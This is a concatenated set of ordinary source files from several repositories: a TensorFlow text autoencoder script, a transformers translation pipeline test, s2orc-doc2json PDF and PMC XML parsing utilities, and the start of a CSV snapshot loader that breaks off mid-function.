bc1 = tf.Variable(tf.random_normal([filter_bank_0,]))
conv1 = tf.nn.conv2d(inputs, wc1, strides=[1, 1, 1, 1], padding='SAME') + bc1
act1 = tf.nn.relu(conv1)
# TensorShape([Dimension(None), Dimension(1), Dimension(4620), Dimension(64)])
wc2 = tf.Variable(tf.random_normal([1, char_sample_size, filter_bank_0, filter_bank_1]))
bc2 = tf.Variable(tf.random_normal([filter_bank_1,]))
conv2 = tf.nn.conv2d(act1, wc2, strides=[1, 1, 1, 1], padding='SAME') + bc2
act2 = tf.nn.relu(conv2)
norm2 = tf.nn.lrn(act2, bitreader.get_sentence_vector_length(1), bias=1.0, alpha=0.001, beta=0.75)
# TensorShape([Dimension(None), Dimension(1), Dimension(4620), Dimension(32)])
# Conv -> FC
# Record encoder shapes for later use.
act2_shape = act2.get_shape().as_list()
act1_shape = act1.get_shape().as_list()
input_shape = inputs.get_shape().as_list()
# Resize
c_fc = tf.reshape(act2, [-1, act2_shape[1]*act2_shape[2]*act2_shape[3]])
# FC segments
wf1 = tf.Variable(tf.random_normal([act2_shape[1]*act2_shape[2]*act2_shape[3], filter_bank_3]))
bf1 = tf.Variable(tf.random_normal([filter_bank_3,]))
full1 = tf.matmul(c_fc, wf1) + bf1
act3 = tf.nn.relu(full1)
# Our prized encoder.
encoder = act3
# Invert steps and begin decoder.
# Start with FC.
wf2 = tf.Variable(tf.random_normal([filter_bank_3, act2_shape[1]*act2_shape[2]*act2_shape[3]]))
bf2 = tf.Variable(tf.random_normal([act2_shape[1]*act2_shape[2]*act2_shape[3],]))
full2 = tf.matmul(act3, wf2) + bf2
act4 = tf.nn.relu(full2)
# FC -> Conv
fc_c = tf.reshape(act4, [-1, act2_shape[1], act2_shape[2], act2_shape[3]])
wc3 = tf.Variable(tf.random_normal([1, char_sample_size, filter_bank_0, filter_bank_1]))
bc3 = tf.Variable(tf.random_normal([act1_shape[1], act1_shape[2], act1_shape[3]]))
conv3 = tf.nn.deconv2d(fc_c, wc3, strides=[1, 1, 1, 1], padding='SAME', output_shape=[-1, act1_shape[1], act1_shape[2], act1_shape[3]]) + bc3
act5 = tf.nn.relu(conv3)
# TensorShape([Dimension(None), Dimension(1), Dimension(4620), Dimension(64)])
wc4 = tf.Variable(tf.random_normal([1, sample_vec_len, 1, filter_bank_0]))
bc4 = tf.Variable(tf.random_normal([input_shape[1], input_shape[2], input_shape[3]]))
conv4 = tf.nn.deconv2d(act5, wc4, strides=[1, 1, 1, 1], padding='SAME', output_shape=[-1, input_shape[1], input_shape[2], input_shape[3]]) + bc4
act6 = tf.nn.relu(conv4)
norm3 = tf.nn.lrn(act6, bitreader.get_sentence_vector_length(1), bias=1.0, alpha=0.001, beta=0.75)
decoder = norm3
return encoder, decoder, [wc1, wc2, wf1, wf2, wc3, wc4], [bc1, bc2, bc3, bc4]
#return tf.nn.max_pool(l_input, ksize=[1, 1, k, 1], strides=[1, 1, k, 1], padding='SAME', name=name)
print("Building model.")
encoder, decoder, weights, biases = build_model("ConvNLP", x, keep_prob)
print("Defining loss functions and optimizer.")
#l2_cost = tf.reduce_sum(tf.nn.l2_loss(reconstruction, x))
l1_cost = tf.reduce_sum(tf.abs(tf.sub(x, decoder)))
cost = l1_cost
optimizer = tf.train.AdamOptimizer(learning_rate=LEARNING_RATE).minimize(cost)
# Define our data iterator
def csv_iterator(filename=INPUT_FILENAME):
if filename.endswith(".gz"):
fin = gzip.open(filename, 'r')
else:
fin = open(filename, 'r')
cin = csv.reader(fin)
for line in cin:
text = line[DATA_COLUMN] # 0 is entry name.
# Iterate through N characters at a time.
for index in range(0, len(text), SENTENCE_LIMIT):
segment = text[index:index+SENTENCE_LIMIT]
segment = segment + "\0"*(SENTENCE_LIMIT-len(segment)) # Zero-pad our sentence.
yield bitreader.string_to_vector(segment)
def batch_buffer(filename=INPUT_FILENAME, batch_size=BATCH_SIZE):
iterator = csv_iterator(filename)
while True:
batch = numpy.zeros([batch_size, 1, bitreader.get_sentence_vector_length(SENTENCE_LIMIT), 1], dtype=numpy.float)
for index, example in zip(range(batch_size), iterator):
batch[index,0,:,0] = example[:]
yield batch
# Train
print("Gathering variables.")
init = tf.initialize_all_variables()
saver = tf.train.Saver()
print("Beginning training session.")
with tf.Session() as sess:
print("Initializing variables.")
sess.run(init)
step = 1
generator = batch_buffer()
print("Session, variables, and generator initialized. Training.")
for step, batch_xs in zip(range(TRAINING_ITERATIONS/BATCH_SIZE), generator):
sess.run(optimizer, feed_dict={x: batch_xs, keep_prob: DROPOUT})
if step % DISPLAY_INCREMENT == 0:
loss = sess.run(cost, feed_dict={x: batch_xs, keep_prob: 1.})
enc, rec = sess.run([encoder, decoder], feed_dict={x: batch_xs, keep_prob: 1.})
print("Iter " + str(step*BATCH_SIZE) + ", Loss= " + "{:.6f}".format(loss))
print("Mapping {} -> {}".format(enc.shape, rec.shape))
print("Example: {} -> {}".format(bitreader.vector_to_string(batch_xs[0,0,:,0]), bitreader.vector_to_string(rec[0,0,:,0])))
step += 1
print "Optimization Finished!"
# sess.run(accuracy, feed_dict={x: asdf, keep_prob: 1.})
# Save results
result = saver.save(sess, "result.ckpt")
print("Saved model to {}".format(result))
``` |
{
"source": "JosephCatrambone/transformers",
"score": 2
} |
#### File: transformers/tests/test_pipelines_translation.py
```python
import unittest
import pytest
from transformers import pipeline
from transformers.testing_utils import is_pipeline_test, is_torch_available, require_torch, slow
from .test_pipelines_common import MonoInputPipelineCommonMixin
if is_torch_available():
from transformers.models.mbart import MBart50TokenizerFast, MBartForConditionalGeneration
class TranslationEnToDePipelineTests(MonoInputPipelineCommonMixin, unittest.TestCase):
pipeline_task = "translation_en_to_de"
small_models = ["patrickvonplaten/t5-tiny-random"] # Default model - Models tested without the @slow decorator
large_models = [None] # Models tested with the @slow decorator
invalid_inputs = [4, "<mask>"]
mandatory_keys = ["translation_text"]
class TranslationEnToRoPipelineTests(MonoInputPipelineCommonMixin, unittest.TestCase):
pipeline_task = "translation_en_to_ro"
small_models = ["patrickvonplaten/t5-tiny-random"] # Default model - Models tested without the @slow decorator
large_models = [None] # Models tested with the @slow decorator
invalid_inputs = [4, "<mask>"]
mandatory_keys = ["translation_text"]
@is_pipeline_test
class TranslationNewFormatPipelineTests(unittest.TestCase):
@require_torch
@slow
def test_default_translations(self):
# We don't provide a default for this pair
with self.assertRaises(ValueError):
pipeline(task="translation_cn_to_ar")
# but we do for this one
translator = pipeline(task="translation_en_to_de")
self.assertEquals(translator.src_lang, "en")
self.assertEquals(translator.tgt_lang, "de")
@require_torch
@slow
def test_multilingual_translation(self):
model = MBartForConditionalGeneration.from_pretrained("facebook/mbart-large-50-many-to-many-mmt")
tokenizer = MBart50TokenizerFast.from_pretrained("facebook/mbart-large-50-many-to-many-mmt")
translator = pipeline(task="translation", model=model, tokenizer=tokenizer)
# Missing src_lang, tgt_lang
with self.assertRaises(ValueError):
translator("This is a test")
outputs = translator("This is a test", src_lang="en_XX", tgt_lang="ar_AR")
self.assertEqual(outputs, [{"translation_text": "ูุฐุง ุฅุฎุชุจุงุฑ"}])
outputs = translator("This is a test", src_lang="en_XX", tgt_lang="hi_IN")
self.assertEqual(outputs, [{"translation_text": "เคฏเคน เคเค เคชเคฐเฅเคเฅเคทเคฃ เคนเฅ"}])
# src_lang, tgt_lang can be defined at pipeline call time
translator = pipeline(task="translation", model=model, tokenizer=tokenizer, src_lang="en_XX", tgt_lang="ar_AR")
outputs = translator("This is a test")
self.assertEqual(outputs, [{"translation_text": "ูุฐุง ุฅุฎุชุจุงุฑ"}])
@require_torch
def test_translation_on_odd_language(self):
model = "patrickvonplaten/t5-tiny-random"
translator = pipeline(task="translation_cn_to_ar", model=model)
self.assertEquals(translator.src_lang, "cn")
self.assertEquals(translator.tgt_lang, "ar")
@require_torch
def test_translation_default_language_selection(self):
model = "patrickvonplaten/t5-tiny-random"
with pytest.warns(UserWarning, match=r".*translation_en_to_de.*"):
nlp = pipeline(task="translation", model=model)
self.assertEqual(nlp.task, "translation_en_to_de")
self.assertEquals(nlp.src_lang, "en")
self.assertEquals(nlp.tgt_lang, "de")
@require_torch
def test_translation_with_no_language_no_model_fails(self):
with self.assertRaises(ValueError):
pipeline(task="translation")
``` |
{
"source": "josephcc/s2orc-doc2json",
"score": 3
} |
#### File: grobid2json/grobid/grobid_client.py
```python
import os
import io
import json
import argparse
import time
import glob
from doc2json.grobid2json.grobid.client import ApiClient
import ntpath
from typing import List
'''
This version uses the standard ProcessPoolExecutor for parallelizing the concurrent calls to the GROBID services.
Given the limits of ThreadPoolExecutor (input stored in memory, blocking Executor.map until the whole input
is acquired), it works with batches of PDF of a size indicated in the config.json file (default is 1000 entries).
We are moving from first batch to the second one only when the first is entirely processed - which means it is
slightly sub-optimal, but should scale better. However acquiring a list of million of files in directories would
require something scalable too, which is not implemented for the moment.
'''
SERVER = 'localhost'
if 'GROBID_URL' in os.environ:
SERVER = os.environ['GROBID_URL']
DEFAULT_GROBID_CONFIG = {
"grobid_server": SERVER,
"grobid_port": "8070",
"batch_size": 1000,
"sleep_time": 5,
"generateIDs": False,
"consolidate_header": False,
"consolidate_citations": False,
"include_raw_citations": True,
"segment_sentences": True,
"include_coordinates": ['s', 'bib', 'biblStruct', 'ref'],
"include_raw_affiliations": False,
"max_workers": 2,
}
class GrobidClient(ApiClient):
def __init__(self, config=None):
self.config = config or DEFAULT_GROBID_CONFIG
self.generate_ids = self.config["generateIDs"]
self.consolidate_header = self.config["consolidate_header"]
self.consolidate_citations = self.config["consolidate_citations"]
self.include_raw_citations = self.config["include_raw_citations"]
self.include_raw_affiliations = self.config["include_raw_affiliations"]
self.include_coordinates = self.config["include_coordinates"]
self.segment_sentences = self.config["segment_sentences"]
self.max_workers = self.config["max_workers"]
self.grobid_server = self.config["grobid_server"]
self.grobid_port = self.config["grobid_port"]
self.sleep_time = self.config["sleep_time"]
def process(self, input: str, output: str, service: str):
batch_size_pdf = self.config['batch_size']
pdf_files = []
for pdf_file in glob.glob(input + "/*.pdf"):
pdf_files.append(pdf_file)
if len(pdf_files) == batch_size_pdf:
self.process_batch(pdf_files, output, service)
pdf_files = []
# last batch
if len(pdf_files) > 0:
self.process_batch(pdf_files, output, service)
def process_batch(self, pdf_files: List[str], output: str, service: str) -> None:
print(len(pdf_files), "PDF files to process")
for pdf_file in pdf_files:
self.process_pdf(pdf_file, output, service)
def process_pdf_stream(self, pdf_file: str, pdf_strm: bytes, output: str, service: str) -> str:
# process the stream
files = {
'input': (
pdf_file,
pdf_strm,
'application/pdf',
{'Expires': '0'}
)
}
the_url = 'http://' + self.grobid_server
the_url += ":" + self.grobid_port
the_url += "/api/" + service
# set the GROBID parameters
the_data = {}
if self.generate_ids:
the_data['generateIDs'] = '1'
else:
the_data['generateIDs'] = '0'
if self.consolidate_header:
the_data['consolidateHeader'] = '1'
else:
the_data['consolidateHeader'] = '0'
if self.consolidate_citations:
the_data['consolidateCitations'] = '1'
else:
the_data['consolidateCitations'] = '0'
if self.include_raw_affiliations:
the_data['includeRawAffiliations'] = '1'
else:
the_data['includeRawAffiliations'] = '0'
if self.include_raw_citations:
the_data['includeRawCitations'] = '1'
else:
the_data['includeRawCitations'] = '0'
if self.segment_sentences:
the_data['segmentSentences'] = '1'
else:
the_data['segmentSentences'] = '0'
if self.segment_sentences:
the_data['segmentSentences'] = '1'
else:
the_data['segmentSentences'] = '0'
if self.include_coordinates:
the_data['teiCoordinates'] = self.include_coordinates
res, status = self.post(
url=the_url,
files=files,
data=the_data,
headers={'Accept': 'text/plain'}
)
if status == 503:
time.sleep(self.sleep_time)
return self.process_pdf_stream(pdf_file, pdf_strm, service)
elif status != 200:
with open(os.path.join(output, "failed.log"), "a+") as failed:
failed.write(pdf_file.strip(".pdf") + "\n")
print('Processing failed with error ' + str(status))
return ""
else:
return res.text
def process_pdf(self, pdf_file: str, output: str, service: str) -> None:
# check if TEI file is already produced
# we use ntpath here to be sure it will work on Windows too
pdf_file_name = ntpath.basename(pdf_file)
filename = os.path.join(output, os.path.splitext(pdf_file_name)[0] + '.tei.xml')
if os.path.isfile(filename):
return
print(pdf_file)
pdf_strm = open(pdf_file, 'rb').read()
tei_text = self.process_pdf_stream(pdf_file, pdf_strm, output, service)
# writing TEI file
if tei_text:
with io.open(filename, 'w+', encoding='utf8') as tei_file:
tei_file.write(tei_text)
def process_citation(self, bib_string: str, log_file: str) -> str:
# process citation raw string and return corresponding dict
the_data = {
'citations': bib_string,
'consolidateCitations': '0'
}
the_url = 'http://' + self.grobid_server
the_url += ":" + self.grobid_port
the_url += "/api/processCitation"
for _ in range(5):
try:
res, status = self.post(
url=the_url,
data=the_data,
headers={'Accept': 'text/plain'}
)
if status == 503:
time.sleep(self.sleep_time)
continue
elif status != 200:
with open(log_file, "a+") as failed:
failed.write("-- BIBSTR --\n")
failed.write(bib_string + "\n\n")
break
else:
return res.text
except Exception:
continue
def process_header_names(self, header_string: str, log_file: str) -> str:
# process author names from header string
the_data = {
'names': header_string
}
the_url = 'http://' + self.grobid_server
the_url += ":" + self.grobid_port
the_url += "/api/processHeaderNames"
res, status = self.post(
url=the_url,
data=the_data,
headers={'Accept': 'text/plain'}
)
if status == 503:
time.sleep(self.sleep_time)
return self.process_header_names(header_string, log_file)
elif status != 200:
with open(log_file, "a+") as failed:
failed.write("-- AUTHOR --\n")
failed.write(header_string + "\n\n")
else:
return res.text
def process_affiliations(self, aff_string: str, log_file: str) -> str:
# process affiliation from input string
the_data = {
'affiliations': aff_string
}
the_url = 'http://' + self.grobid_server
the_url += ":" + self.grobid_port
the_url += "/api/processAffiliations"
res, status = self.post(
url=the_url,
data=the_data,
headers={'Accept': 'text/plain'}
)
if status == 503:
time.sleep(self.sleep_time)
return self.process_affiliations(aff_string, log_file)
elif status != 200:
with open(log_file, "a+") as failed:
failed.write("-- AFFILIATION --\n")
failed.write(aff_string + "\n\n")
else:
return res.text
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Client for GROBID services")
parser.add_argument("service", help="one of [processFulltextDocument, processHeaderDocument, processReferences]")
parser.add_argument("--input", default=None, help="path to the directory containing PDF to process")
parser.add_argument("--output", default=None, help="path to the directory where to put the results")
parser.add_argument("--config", default=None, help="path to the config file, default is ./config.json")
args = parser.parse_args()
input_path = args.input
config = json.load(open(args.config)) if args.config else DEFAULT_GROBID_CONFIG
output_path = args.output
service = args.service
client = GrobidClient(config=config)
start_time = time.time()
client.process(input_path, output_path, service)
runtime = round(time.time() - start_time, 3)
print("runtime: %s seconds " % (runtime))
```
#### File: jats2json/pmc_utils/back_tag_utils.py
```python
from typing import Dict, List
def _wrap_text(tag):
return tag.text if tag else ''
def parse_authors(authors_tag) -> List:
"""The PMC XML has a slightly different format than authors listed in front tag."""
if not authors_tag:
return []
authors = []
for name_tag in authors_tag.find_all('name', recursive=False):
surname = name_tag.find('surname')
given_names = name_tag.find('given-names')
given_names = given_names.text.split(' ') if given_names else None
suffix = name_tag.find('suffix')
authors.append({
'first': given_names[0] if given_names else '',
'middle': given_names[1:] if given_names else [],
'last': surname.text if surname else '',
'suffix': suffix.text if suffix else ''
})
return authors
def parse_bib_entries(back_tag) -> Dict:
bib_entries = {}
# TODO: PMC2778891 does not have 'ref-list' in its back_tag. do we even need this, or can directly .find_all('ref')?
ref_list_tag = back_tag.find('ref-list')
if ref_list_tag:
for ref_tag in ref_list_tag.find_all('ref'):
# The ref ID and label are semantically swapped between CORD-19 and PMC, lol
ref_label = ref_tag['id']
ref_id = ref_tag.find('label')
authors_tag = ref_tag.find('person-group', {'person-group-type': 'author'})
year = ref_tag.find('year')
fpage = ref_tag.find('fpage')
lpage = ref_tag.find('lpage')
pages = f'{fpage.text}-{lpage.text}' if fpage and lpage else None
dois = [tag.text for tag in ref_tag.find_all('pub-id', {'pub-id-type': 'doi'})]
bib_entries[ref_label] = {
'ref_id': _wrap_text(ref_id),
'title': _wrap_text(ref_tag.find('article-title')),
'authors': parse_authors(authors_tag),
'year': int(year.text) if year and year.text.isdigit() else None,
'venue': _wrap_text(ref_tag.find('source')),
'volume': _wrap_text(ref_tag.find('volume')),
'issn': _wrap_text(ref_tag.find('issue')),
'pages': pages,
'other_ids': {
'DOI': dois,
}
}
return bib_entries
```
#### File: jats2json/pmc_utils/front_tag_utils.py
```python
from typing import Dict, List, Optional
from collections import Counter
import re
from doc2json.jats2json.pmc_utils.all_tag_utils import recurse_parse_section, parse_all_paragraphs_in_section, \
replace_sup_sub_tags_with_string_placeholders, replace_xref_with_string_placeholders
class NoAuthorNamesError(Exception):
"""Known papers that trigger:
- PMC3462967
"""
pass
def parse_journal_id_tag(front_tag) -> str:
"""
front_tag.find_all('journal-id') returns:
[
<journal-id journal-id-type="nlm-ta">Neurosci J</journal-id>,
<journal-id journal-id-type="iso-abbrev">Neurosci J</journal-id>,
<journal-id journal-id-type="publisher-id">NEUROSCIENCE</journal-id>
]
[
<journal-id journal-id-type="nlm-ta">BMC Biochem</journal-id>
<journal-id journal-id-type="iso-abbrev">BMC Biochem</journal-id>
]
"""
c = Counter()
for tag in front_tag.find_all('journal-id'):
c[tag.text] += 1
tag.decompose()
journal_id, n = c.most_common(1)[0]
return journal_id
def parse_journal_name_tag(front_tag) -> str:
"""
Examples:
# Paper 1
<journal-title-group>
<journal-title>BMC Biochemistry</journal-title>
</journal-title-group>
# Paper 2
<journal-title-group>
<journal-title>Neuroscience Journal</journal-title>
</journal-title-group>
But not all titles are contained within a `journal-title-group`. See PMC1079901
<journal-meta>
<journal-id journal-id-type="nlm-ta">
Biomed Eng Online
</journal-id>
<journal-title>
BioMedical Engineering OnLine
</journal-title>
...
"""
if len(front_tag.find_all('journal-title')) > 1:
raise Exception('Multiple journal titles?!')
return front_tag.find('journal-title').extract().text
def parse_pubmed_id_tag(front_tag) -> Optional[str]:
"""Not every PMC paper has a PMID """
pmid_tag = front_tag.find('article-id', {'pub-id-type': 'pmid'})
if pmid_tag is None:
return None
else:
return pmid_tag.extract().text
def parse_pmc_id_tag(front_tag) -> str:
return f"PMC{front_tag.find('article-id', {'pub-id-type': 'pmc'}).extract().text}"
def parse_doi_tag(front_tag) -> Optional[str]:
"""Not all papers have a DOI"""
doi_tag = front_tag.find('article-id', {'pub-id-type': 'doi'})
if doi_tag is not None:
return doi_tag.extract().text
else:
return None
def parse_title_tag(front_tag) -> str:
"""
Examples:
# Paper 1
<title-group>
<article-title>Role of the highly conserved G68 residue in the yeast phosphorelay protein Ypd1: implications for interactions between histidine phosphotransfer (HPt) and response regulator proteins</article-title>
</title-group>
# Paper 2
<title-group>
<article-title>Association of Strength and Physical Functions in People with Parkinson's Disease</article-title>
</title-group>
Want to restrict to `title-group` because sometimes title shows up in <notes> under self-citation
"""
title_group = front_tag.find('title-group').extract()
if len(title_group.find_all('article-title')) > 1:
raise Exception('Multiple article titles?!')
return title_group.find('article-title').text
def parse_category_tag(front_tag) -> List[str]:
"""
Examples:
# Paper 1
<article-categories>
<subj-group subj-group-type="heading">
<subject>Research Article</subject>
</subj-group>
</article-categories>
# Paper 2
<article-categories>
<subj-group subj-group-type="heading">
<subject>Research Article</subject>
</subj-group>
</article-categories>
"""
if len(front_tag.find_all('subj-group')) > 1 or len(front_tag.find_all('subject')) > 1:
raise Exception('Multiple categories?!')
article_categories = front_tag.find('article-categories').extract()
return article_categories.find('subject').text
def parse_date_tag(front_tag) -> Dict:
"""
Two sets of tags contain dates:
<pub-date pub-type="collection">
<year>2018</year>
</pub-date>
<pub-date pub-type="epub">
<day>12</day>
<month>12</month>
<year>2018</year>
</pub-date>
And:
<history>
<date date-type="received">
<day>15</day>
<month>10</month>
<year>2018</year>
</date>
<date date-type="rev-recd">
<day>20</day>
<month>11</month>
<year>2018</year>
</date>
<date date-type="accepted">
<day>26</day>
<month>11</month>
<year>2018</year>
</date>
</history>
PMC2557072 has `date` tag with no `day`, only `year` and `month`
"""
out = {}
for pub_date in front_tag.find_all('pub-date'):
year = pub_date.find('year')
month = pub_date.find('month')
day = pub_date.find('day')
out[pub_date.get('pub-type', 'MISSING_PUB_TYPE')] = '-'.join([tag.text for tag in [year, month, day] if tag is not None])
pub_date.decompose()
for date in front_tag.find_all('date'):
year = date.find('year')
month = date.find('month')
day = date.find('day')
out[date.get('date-type', 'MISSING_DATE_TYPE')] = '-'.join([tag.text for tag in [year, month, day] if tag is not None])
date.decompose()
return out
def parse_funding_groups(front_tag) -> List[str]:
outs = []
for tag in front_tag.find_all():
# AND statement skips cases where the two tag types nest within each other; we only process the inner one
if (tag.name == 'funding-source' or tag.name == 'funding-statement') and tag.find('funding-source') is None and tag.find('funding-statement') is None:
out = {
'name': None,
'doi': None,
'notes': None,
# 'raw': str(tag) # for debugging
}
# handle institution
institution_id_tag = tag.find('institution-id')
if institution_id_tag:
out['doi'] = institution_id_tag.extract().text.replace('http://dx.doi.org/', '')
institution_tag = tag.find('institution')
if institution_tag:
out['name'] = tag.find('institution').extract().text
# handle named content
funder_name_tag = tag.find('named-content', {'content-type': 'funder-name'})
if funder_name_tag:
out['name'] = funder_name_tag.extract().text
funder_id_tag = tag.find('named-content', {'content-type': 'funder-identifier'})
if funder_id_tag:
out['doi'] = funder_id_tag.extract().text.replace('http://dx.doi.org/', '')
# handle urls
if tag.get('xlink:href'):
out['doi'] = tag['xlink:href']
# fix DOIs with URLs in them
if out['doi']:
match = re.search(r'http(s?)://dx.doi.org/(.+)', out['doi'])
if match:
out['doi'] = match.group(2)
# remainder text is either a name or a full statement
text = tag.text
if tag.name == 'funding-statement' or ('fund' in text or 'support' in text or 'provide' in text):
out['notes'] = text
else:
# what if something already in 'name'? observed it's typically empty string; so ignore.
if not out['name']:
out['name'] = text
# if DOI link is in the name, remove it and parse (PMC5407128)
if out['name'] and not out['doi']:
pattern = r'\s*http(s?)://dx.doi.org/(.+)$'
match = re.search(pattern, out['name'])
if match:
out['doi'] = match.group(2)
out['name'] = re.sub(pattern, r'', out['name'])
outs.append(out)
return outs
# TODO: didnt want to handle <collab> group names; seemed rare and inconsistent; focus on <contrib> with <name> and <aff>
def parse_authors(front_tag) -> List[Dict]:
authors = []
for contrib_tag in front_tag.find_all('contrib'):
# skip nesting; just process children (individual authors)
if contrib_tag.find_all('contrib'):
continue
# skip contribs without a name; these should be ones that consist of <collab> tag
if contrib_tag.find('name') is None:
continue
# corresponding tag
if (contrib_tag.get('corresp') == 'yes') or (contrib_tag.find('xref', {'ref-type': 'corresp'})):
is_corresp = True
else:
is_corresp = False
# orcid ID is sometimes a URL or just a number. standardize as hyphenized number.
if contrib_tag.find('contrib-id'):
orcid_id = contrib_tag.find('contrib-id').text
match = re.search(r'http(s?)://orcid.org/(.+)', orcid_id)
if match:
orcid_id = match.group(2)
# A very small number of articles have ID type CATS, which we don't handle. For example:
# /disk2/gorpus/20200101/pmc/Change/PMC6176774.nxml
if len(orcid_id) != 19:
orcid_id = None
else:
orcid_id = None
# Email may or may not be present.
email = contrib_tag.find('email')
email = email.text if email else None
# Get the name info for the author.
name_info = {name_tag.name: name_tag.text for name_tag in contrib_tag.find('name').find_all()}
# TODO: PMC3462967 is an Erratum. It does not have ['given-names']. not sure we care about those, so try-catch for now
try:
given_names = name_info['given-names'].split(' ')
except KeyError as e:
raise NoAuthorNamesError
authors.append({
'first': given_names[0] if given_names else None,
'middle': given_names[1:] if given_names else None,
'last': name_info['surname'],
'suffix': name_info.get('suffix', ''),
'email': email,
'affiliation_ids': [xref_tag.get('rid') for xref_tag in contrib_tag.find_all('xref', {'ref-type': 'aff'})],
'corresponding': is_corresp,
'orcid': orcid_id
})
# authors.append(str(contrib_tag.extract()))
return authors
def parse_affiliations(front_tag) -> List[Dict]:
"""
Sometimes affiliations is nested within '<contrib-group>' along with
authors. Sometimes, they're not and listed outside as multiple tags.
Not all <aff> have IDs. For example:
<aff><NAME>, Minnesota</aff>
"""
outs = []
for aff_tag in front_tag.find_all('aff'):
if aff_tag.find('label'): # get rid of unused markers so `.text` is cleaner
aff_tag.find('label').decompose()
if aff_tag.find('sup'):
aff_tag.find('sup').decompose() # same treatment as label
aff_id = aff_tag.get('id')
# it looks like we want to go to the full affiliation surface form without worrying about all possible handlings of <named-content> and other fields
# BUT, we do want to keep ISNI and GRID IDs when they occur. They seem to occur typically within <institution-wrap>
# so let's handle those if they exist; safely decompose the tags (because they dont contribute to surface form); then grab remaining affiliation surface form
# implicit in this approach is that we dont need to actually handle <institution-wrap> tags because only one per affiliation
if len(aff_tag.find_all('institution-wrap')) > 1:
import pdb; pdb.set_trace()
id_type_to_id = {}
for institution_id_tag in aff_tag.find_all('institution-id'):
id_type_to_id[institution_id_tag['institution-id-type']] = institution_id_tag.text
institution_id_tag.decompose()
# TODO: processing of text: there are a lot of random newline chars (cuz XML preserves page layout)
# --> replace them with whitespace if there's preceding punctuation char
# --> otherwise, replace them with comma
text = aff_tag.text
outs.append({
'id': aff_id,
'other_ids': id_type_to_id,
'text': text
})
return outs
def parse_abstract_tag(front_tag, soup) -> List[Dict]:
"""Not every paper has an abstract
Furthermore, note very abstract is structured into sections.
Some abstracts (see PMC1914226) look like:
<abstract>
<p> ... </p>
<p> ... </p>
</abstract>
"""
# TODO: are there cases where <abstract> text <p> text </> </abstract> ?
abstract: List[Dict] = []
if front_tag.find('abstract'):
abstract_tag = front_tag.find('abstract').extract()
# replace all xref tags with string placeholders
replace_xref_with_string_placeholders(soup_tag=abstract_tag, soup=soup)
# replace all sup/sub tags with string placeholders
replace_sup_sub_tags_with_string_placeholders(soup_tag=abstract_tag, soup=soup)
if abstract_tag.find('sec'):
all_par_blobs = []
for sec_tag in abstract_tag.find_all('sec', recursive=False):
par_blobs = recurse_parse_section(sec_tag=sec_tag)
all_par_blobs.extend(par_blobs)
else:
all_par_blobs = parse_all_paragraphs_in_section(sec_tag=abstract_tag)
for par_blob in all_par_blobs:
# these 'sections' typically show up as empty string
par_blob['section'] = 'Abstract'
abstract.append(par_blob)
return abstract
```
#### File: doc2json/utils/refspan_util.py
```python
from typing import List, Tuple
def replace_refspans(
spans_to_replace: List[Tuple[int, int, str, str]],
full_string: str,
pre_padding: str = "",
post_padding: str = "",
btwn_padding: str = ", "
) -> str:
"""
For each span within the full string, replace that span with new text
:param spans_to_replace: list of tuples of form (start_ind, end_ind, span_text, new_substring)
:param full_string:
:param pre_padding:
:param post_padding:
:param btwn_padding:
:return:
"""
# assert all spans are equal to full_text span
assert all([full_string[start:end] == span for start, end, span, _ in spans_to_replace])
# assert none of the spans start with the same start ind
start_inds = [rep[0] for rep in spans_to_replace]
assert len(set(start_inds)) == len(start_inds)
# sort by start index
spans_to_replace.sort(key=lambda x: x[0])
# form strings for each span group
for i, entry in enumerate(spans_to_replace):
start, end, span, new_string = entry
# skip empties
if end <= 0:
continue
# compute shift amount
shift_amount = len(new_string) - len(span) + len(pre_padding) + len(post_padding)
# shift remaining appropriately
for ind in range(i + 1, len(spans_to_replace)):
next_start, next_end, next_span, next_string = spans_to_replace[ind]
# skip empties
if next_end <= 0:
continue
# if overlap between ref span and current ref span, remove from replacement
if next_start < end:
next_start = 0
next_end = 0
next_string = ""
# if ref span abuts previous reference span
elif next_start == end:
next_start += shift_amount
next_end += shift_amount
next_string = btwn_padding + pre_padding + next_string + post_padding
# if ref span starts after, shift starts and ends
elif next_start > end:
next_start += shift_amount
next_end += shift_amount
next_string = pre_padding + next_string + post_padding
# save adjusted span
spans_to_replace[ind] = (next_start, next_end, next_span, next_string)
spans_to_replace = [entry for entry in spans_to_replace if entry[1] > 0]
spans_to_replace.sort(key=lambda x: x[0])
# apply shifts in series
for start, end, span, new_string in spans_to_replace:
assert full_string[start:end] == span
full_string = full_string[:start] + new_string + full_string[end:]
return full_string
def sub_spans_and_update_indices(
spans_to_replace: List[Tuple[int, int, str, str]],
full_string: str
) -> Tuple[str, List]:
"""
Replace all spans and recompute indices
:param spans_to_replace:
:param full_string:
:return:
"""
# TODO: check no spans overlapping
# TODO: check all spans well-formed
# assert all spans are equal to full_text span
assert all([full_string[start:end] == token for start, end, token, _ in spans_to_replace])
# assert none of the spans start with the same start ind
start_inds = [rep[0] for rep in spans_to_replace]
assert len(set(start_inds)) == len(start_inds)
# sort by start index
spans_to_replace.sort(key=lambda x: x[0])
# compute offsets for each span
new_spans = [[start, end, token, surface, 0] for start, end, token, surface in spans_to_replace]
for i, entry in enumerate(spans_to_replace):
start, end, token, surface = entry
new_end = start + len(surface)
offset = new_end - end
new_spans[i][1] += offset
for new_span_entry in new_spans[i+1:]:
new_span_entry[4] += offset
# generate new text and create final spans
new_text = replace_refspans(spans_to_replace, full_string, btwn_padding="")
new_spans = [(start + offset, end + offset, token, surface) for start, end, token, surface, offset in new_spans]
return new_text, new_spans
```
#### File: s2orc-doc2json/tests/test_read_write.py
```python
import os
import unittest
import json
from doc2json.s2orc import load_s2orc
JSON_INPUT_DATA = os.path.join('tests', 'pdf', 'N18-3011.json')
class TestS2ORC(unittest.TestCase):
def test_read_write(self):
"""
Check loading current s2orc files
:return:
"""
with open(JSON_INPUT_DATA, 'r') as f:
data = json.load(f)
try1 = load_s2orc(data)
output1 = try1.release_json("pdf")
try2 = load_s2orc(data)
output2 = try2.release_json("pdf")
for key, value in output2.items():
if key == 'header':
assert value != output1[key]
else:
assert value == output1[key]
``` |
{
"source": "josephcc/tab-track",
"score": 3
} |
#### File: tab-track/analysis/loaders.py
```python
import sys
import csv
from itertools import *
from bisect import *
from operator import *
from containers import *
from collections import defaultdict
def loadSnapshot(fn):
snapshots = []
with open(fn, 'rb') as csvfile:
snapshotRows = defaultdict(list)
csvreader = csv.reader(csvfile)
for row in csvreader:
if row[0] == 'snapshotId' or len(row) != 13:
continue
snapshotRows[row[0]].append(row)
for _, rows in snapshotRows.items():
